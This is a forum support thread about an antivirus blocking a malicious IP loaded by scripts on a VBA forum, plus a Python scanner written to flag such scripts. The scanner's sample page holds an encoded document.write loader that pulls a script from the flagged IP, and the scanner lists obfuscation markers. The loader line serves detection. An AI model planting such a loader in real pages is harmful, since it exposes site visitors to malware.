In the last week, a forum I subscribe to, www.vbaexpress.com, does not allow me to log in as Avast pops up the error message below/attached. It is particular to that website; I have no other problems, my browser works normally and I ran a boot scan - nothing - and it doesn’t appear in any log. The admin of the forum posted that no one else seemed to have that problem (but then they use Norton). Their IP is 72… not 78… so I am really confused over this.
Strange, I have just visited that link and there was no alert from the Network Shield.
However, it isn’t vbaexpress that the Network Shield is blocking, but something on your system trying to access the IP address 78.110.175.21. There is a topic on this one, see http://forum.avast.com/index.php?topic=41423.0 and this particular post, see quote below.
See if this file is in the system32 folder, and add it to the User Files section of the avast Chest and send a sample to avast (see below). Important: don’t do anything with the file in the c:\windows\system32\drivers folder.
Add the file to the User Files (File, Add) section of the avast chest (if it isn’t already there) where it can do no harm and send it from there. A copy of the file/s will remain in the original location, so you will need to take further action and can remove/rename that.
Send it from the User Files section of the chest (select the file, right click, email to Alwil Software). It will be uploaded (not actually emailed) to avast when the next avast auto (or manual) update is done.
It isn’t an ad on the site (or I too would have got the alert when I checked it), that IP address is associated with a known malware source. avast isn’t alerting on a specific file but something trying to gain access to that IP.
The IP also has history in the forums, which is why I sent stanl to the other topic.
I tried the wdmaud.sys suggestion. The file was located only in the …\drivers folder, and erasing it didn’t eliminate the Network Shield pop-up, and the sys file returned. However, I copied wdmaud.sys from c:\windows\servicepackfiles\i386 and overwrote the one in …\drivers and, although identical in byte count and date, the pop-up didn’t appear when I navigated to the vbaexpress forum… Hopefully it stays that way, although I still don’t understand. Stan
I said not to touch that, I even put it in red, as it isn’t that one at all ???
As I said, it had nothing to do with the vbaexpress site; that just happened to be the site you were viewing when avast alerted to the attempt from your system to connect to that IP number (Russian domain).
There may still be that file in the system32 folder make sure it isn’t hidden or not showing the file type, etc, see below.
Ensure that you have hidden files and folders enabled and disable hide system files in Windows Explorer, Tools, Folder Options, Hidden files and folders, Hide extensions for known file types, etc. see image.
Sorry, but no, that file is not in system32, and yes, the Network Shield pop-up came back. This is happening at home, where there is my laptop, my wife’s and two old desktops (Compaq and Dell) on Time Warner broadband. After the pop-up came back, I went downstairs and fired up my old Dell, navigated to vbaexpress and the Network Shield pop-up appeared again. I haven’t even powered the Dell on in a month, so I was wondering if somehow the pop-up is connected to our router address [NOTE: the Dell and Compaq are in a workgroup to share printers, but the laptops are independent of the desktops and connect via wifi].
And, why it picks that particular url is beyond me, there are other forums and blogs I frequent several times a day, while vbaexpress is a once a week thing. Stan
I thought that the pop-ups would come back as they weren’t related to that file in the drivers folder.
Well, your Dell would probably have an old version of the program and I don’t know what VPS version it might have, as this doesn’t alarm on my system. You say it alarmed again on vbaexpress, but was it the same IP alert as opposed to a specific alert to the vbaexpress site?
My concern is the IP address as this has been associated with google searches, etc. and this would be totally unrelated to vbaexpress as I and others would be getting alerts on the site when we visited it.
Networks can get cross infected so checking for that file in the system32 folder on that system is a thing you should do.
Try running this tool first on the original system with the old system disconnected from the network, and then on the old Dell whilst it is still off the network.
What is even stranger about this (at least to me) is I have two favorites: one goes to the main vbaexpress URL, the second goes directly to the forum, which is a button on the main URL. I have removed the forum link, removed all cookies, passwords, autocompletes, ran Ad-Aware, Spybot and Malwarebytes, deleted restore points, ran an avast boot scan. I can click on the link to go to the vbaexpress main site and tell Windows not to persist my password. Everything is fine. But, when I click on the button to go to the forum, the Network Shield message pops up. My lmhosts file is clear. I have thought about asking the vbaexpress admin to remove my user name and let me sign back up again under a different password just to see if that makes a difference, as I have had at least one user mention that it is not out of the question that a php forum could get infected.
I don’t know where this button to go to the forums is that you mention (from the link you first provided), but I clicked a forum link http://vbaexpress.com/forum/ and avast didn’t alert on that page.
So I really don’t know what the problem is; you will have to be more specific about the link/URL as I can’t find it. However, I’m not logging in as I’m not registered.
I’m using Firefox with NoScript (but allowed vbaexpress), but I do notice that there are a lot of off-site scripts and, worse still, they only show an IP address rather than the domain. To me when I see this I ask what are they trying to hide. One of the IPs is Russian so I would wonder what is at that end:
inetnum: 78.110.175.0 - 78.110.175.255
netname: LIMIT-SUREHOST-IP-1
descr: LIMIT SUREHOST IP RANGE 1
country: RU
I enter my user/pw - no problem - then I get the attached screen [I don’t allow windows to save my password]
I click the button for Forum - the malicious error message pops-up
[previously, after I logged in, I just created a favorites link to the forum url url so I could go directly to the forum].
I have run/re-run multiple anti-virus, Ad-Aware, Spybot, CureIt and avast boot scans on my laptop and Dell - and am beginning to agree with another poster on this thread that my login has been signalled for adware and Avast is blocking it. If I can conclude this with some certainty I would like to bring it up with the admins of vbaexpress. Stan
So does this happen if you just go to the forums before you log on? Obviously I can’t do that to test what is happening to you. By the same account nor could any of the Alwil team who would try and investigate if you have reported this as a possible FP on vbaexpress, but as I said earlier it isn’t alerting on that site, but there must be some link to the malicious site.
Having gone over the topic again and looked at the IP address in your first image, you will see that it is the same as the highlighted IP in my last image. So even on that home page there is a script tag with a link to that malicious site alert. So in theory I should have had an alert, but because I use Firefox with NoScript, the script associated with that IP would be blocked, so no attempt to connect and no avast alert. If I try to connect directly to this IP avast does alert.
So yes, you should report this to the site admins/webmaster, who will want to check for suspect tags on their site; it could have been hacked, as personally I can’t see any reason for a link to a Russian site, let alone one that is masked by using just its IP and not a domain name.
So does this happen if you just go to the forums before you logon
Yes, but that was when I had windows save my password. Here again [attached] I log into the main url, and actually pull up a kb article, but as soon as I click on forum the pop-up surfaces. Stan
I’m not surprised, as there is a script on the forums home page that accesses the suspect site; my image in Reply #11 (also image2 in this post) and your first image both have the IP address that avast is alerting on.
So it doesn’t seem to matter if you log on or just visit the forums home page, those scripts would be loaded; with Firefox and NoScript this doesn’t happen as all scripts are blocked unless you specifically allow them.
If I visit the forums home page vbaexpress.com/forum/, without allowing scripts there is only one script blocked that of vbaexpress see image1, if I temporarily allow vbaexpress then there are two further scripts that want to run, see image2 and it is one of those that is for the blocked site.
So in short there really isn’t anything else I can say this really is now down to the Admins/webmaster to investigate why this happens and do something about it.
I cannot thank you enough. I had already forwarded your information via printscreen to the forum. I am assuming Alwil already had that site pegged as ‘malicious’… if this works out in the long run we all benefit.
Well, the IP address causing the issues is in a list of blacklisted addresses in the Network Shield to stop people reaching known malware sites; your first image shows it is the Network Shield alerting. That site IP has cropped up in the avast forums (a search will find it) and if I remember rightly it is a particularly nasty infection.
On my images you will see a red IP address at the bottom, that is the vbaexpress site, so it helps by confirming I was at the vbaexpress site (and not some phishing site).
Also on the forums home page (I didn’t mention it) there is a <script> tag that has a huge chunk of obfuscated javascript. I honestly can’t see a legitimate purpose for this; javascript is a plain language and when I see that I wonder what it is that they are trying to hide. Now that according to the script title is some Yahoo counter, which I find hard to believe, so it could be that that script is the source of the problem, I don’t have enough experience to say.
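The two checks the helper walks through above (off-site script tags that point at a bare IP address, in particular one inside the 78.110.175.0 - 78.110.175.255 range from the whois quote, and an inline script that is heavily obfuscated) can be automated over a saved copy of a page. The scanner below is an added example for this thread; it is not code from the original posts, from vbaexpress or from Alwil/Avast. The sample markup, the example.com page host and the 203.0.113.7 address are constructed for the example, and the obfuscation markers and the score threshold are the example's own assumptions, not Avast's detection logic.

```python
"""Scan saved HTML for script tags loaded from bare IPs / a suspect range,
and give inline scripts a rough obfuscation score. Added example; not code
from the thread, vbaexpress or Avast."""
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Range taken from the whois quote earlier in the thread (LIMIT-SUREHOST-IP-1).
# Assumption: the whole /24 is treated as suspect; Avast's own Network Shield
# list is not public and is not reproduced here.
SUSPECT_RANGES = [ipaddress.ip_network("78.110.175.0/24")]

# Constructs a plain counter script rarely needs but packed loaders rely on.
# These markers are the example's assumption, not a known detection rule.
OBFUSCATION_MARKERS = ("eval(", "unescape(", "fromCharCode", "document.write(")
ESCAPE_RE = re.compile(r"\\x[0-9a-fA-F]{2}|%[0-9a-fA-F]{2}")


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []      # src attribute of every <script src=...>
        self.inline = []        # body of every <script> without src
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def classify_src(src, page_host):
    """Label a script src: same-site, off-site, bare-ip or blocklisted-ip."""
    host = urlparse(src).hostname
    if host is None:                  # relative URL: same origin as the page
        return "same-site"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:                # a hostname, not an address
        return "same-site" if host == page_host else "off-site"
    if any(ip in net for net in SUSPECT_RANGES):
        return "blocklisted-ip"
    return "bare-ip"                  # loaded from a raw IP: worth a look


def obfuscation_score(body):
    """Crude score: one point per suspicious call, one per ten escaped bytes."""
    score = sum(body.count(marker) for marker in OBFUSCATION_MARKERS)
    return score + len(ESCAPE_RE.findall(body)) // 10


def scan_page(html, page_host):
    """Return (external, inline) findings for one HTML document."""
    collector = ScriptCollector()
    collector.feed(html)
    collector.close()
    external = [(src, classify_src(src, page_host)) for src in collector.external]
    inline = [(obfuscation_score(b), b.strip()[:60]) for b in collector.inline]
    return external, inline


def flagged(html, page_host, threshold=2):
    """Only the items a webmaster should go and look at."""
    external, inline = scan_page(html, page_host)
    bad_src = [s for s, v in external if v in ("bare-ip", "blocklisted-ip")]
    bad_inline = [snippet for score, snippet in inline if score >= threshold]
    return bad_src, bad_inline


# Constructed sample page; it does not reproduce the real vbaexpress markup.
# Only the 78.110.175.21 address comes from the thread.
SAMPLE_PAGE = """<html><head>
<script src="/forum/site.js"></script>
<script src="http://example.com/forum/menu.js"></script>
<script src="http://www.google-analytics.com/ga.js"></script>
<script src="http://203.0.113.7/stats.js"></script>
<script src="http://78.110.175.21/counter.js"></script>
<script type="text/javascript">
document.write(unescape('%3Cscript%20src%3D%22http%3A%2F%2F78.110.175.21%2Fx.js%22%3E%3C%2Fscript%3E'));
</script>
<script>var visible = 1; function ok() { return visible + 1; }</script>
</head><body>forum index</body></html>"""

if __name__ == "__main__":
    for src, verdict in scan_page(SAMPLE_PAGE, "example.com")[0]:
        print(f"{verdict:15} {src}")
    for score, snippet in scan_page(SAMPLE_PAGE, "example.com")[1]:
        print(f"inline score {score}: {snippet}")
```

Run it against a page saved with "View Source" rather than against the live site, so the scan itself never makes the outbound connection the Network Shield is blocking. A script that is only reachable by IP and sits inside the quoted range is the thing to show the webmaster; a high inline score is a reason to read that script, not proof by itself.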
just an FYI: another user just posted that a malicious redirect might be responsible for the slowdown he and other users have experienced in the past week. Stan